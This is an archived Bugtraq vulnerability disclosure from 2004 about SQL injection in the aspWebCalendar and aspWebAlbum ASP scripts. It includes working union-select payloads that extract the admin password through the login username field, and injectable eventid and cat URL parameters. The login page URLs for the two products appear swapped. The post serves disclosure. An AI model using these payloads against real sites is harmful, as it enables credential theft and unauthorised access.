[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: aspWebCalendar /aspWebAlbum: SQL injection
From: Pedro Sanches <pedro_sanches () sapo ! pt>
Date: 2004-09-23 18:27:02
Message-ID: 20040923182702.17881.qmail () www ! securityfocus ! com
[Download RAW message or body]
[1]Introduction
"aspWebCalendar is an .asp (Active Server Pages) script that allows you to easily \
create an online events calendar that supports multiple users. Easy installation and \
usage are the key features of aspWebCalendar. The script contains a text file with a \
few configuration variables that are used by the script... Just change one of these \
variables, upload the files and you are up and running."
"aspWebAlbum is an .asp (Active Server Pages) script that allows you to easily create \
an online photo album or gallery simply by uploading images to your server... the \
script will do the rest. Easy installation and usage are the key features of \
aspWebAlbum. The script contains a text file with several configuration variables \
that are used by the script... just change two of these and you are up and running. \
To add images simply upload them to your server, its that simple."
This information was taken from http://www.jancw.dk/ but the vendor of this software \
is Full Revolution and the website can be found at www.fullrevolution.com
[2]The Problem
These two can run on SQL or Access databases, both coming right from the box, and \
those who use the default sql file are vulnerable to injection, alowing, f.e., an \
attacker to view the table contents by reading the asp error messages.
(1) For the aspWebCalendar, in the login pages:
"www.example.com/album.asp?action=login"
you can put this in the username field (leaving the password blank) to extract the \
password for the 'admin' user, if it exists:
" ' union select Cal_User_Password,1,1,1,1,1,1,1,1,1 from Cal_User where \
Cal_User_UserName = 'admin'-- "
(1.1) the 'eventid' field is vulnerable to sql injection too:
"www.example.com/calendar.asp?action=eventdetail&eventid='"
(2) For the aspWebAlbum, the login pages can be found at \
"www.example.com/calendar.asp?action=login" and the problem is the same (i'll use the \
same example as above) :
"' union select Gal_UserPassword,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from Gal_Users where \
Gal_UserUserName = 'admin' --"
(2.2) The 'cat' field is also a problem in this example:
"www.example.com/album.asp?cat='"
At the moment all the SQL versions of this software seem to be affected.
[3]Timeline
(28/8/2004) vuln discovered
(29/8/2004) short note posted at johnny.ihackstuff.com forums
(15/9/2004) vendor notified, still no reply
[4]Feedback
cybercide@megamail.pt
(This is my first vulnerability disclosure so if there's a mistake here don't hurt me \
too much :-) )
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic